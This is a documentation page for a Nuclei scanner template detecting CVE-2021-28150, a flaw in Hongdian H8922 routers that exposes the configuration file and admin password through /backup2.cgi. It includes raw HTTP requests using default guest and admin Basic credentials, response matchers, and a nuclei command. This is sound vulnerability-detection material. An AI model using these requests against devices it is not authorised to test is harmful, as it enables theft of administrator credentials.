Hongdian H8922 3.0.5 - Information Disclosure
ID: CVE-2021-28150
Severity: medium
Author: gy741
Tags: cve2021,cve,hongdian,exposure
Description
Section titled “Description”Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2021-28150
info: name: Hongdian H8922 3.0.5 - Information Disclosure author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users. remediation: | Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 - https://github.com/SexyBeast233/SecBooks - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00253 epss-percentile: 0.6512 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian product: h8922_firmware tags: cve2021,cve,hongdian,exposure
http: - raw: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream"
- type: word part: body words: - "CLI configuration saved from vty" - "service webadmin"
- type: status status: - 200# digest: 4a0a0047304502210089fb29838da8dc7eb8d0d88d455e72d1000db5a2acafe7ca484b12c7a615239902206c8a7ded0568ccad08047bb5b2d39a476910ce29ca6f229f734527d1d85ede4f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-28150.yaml"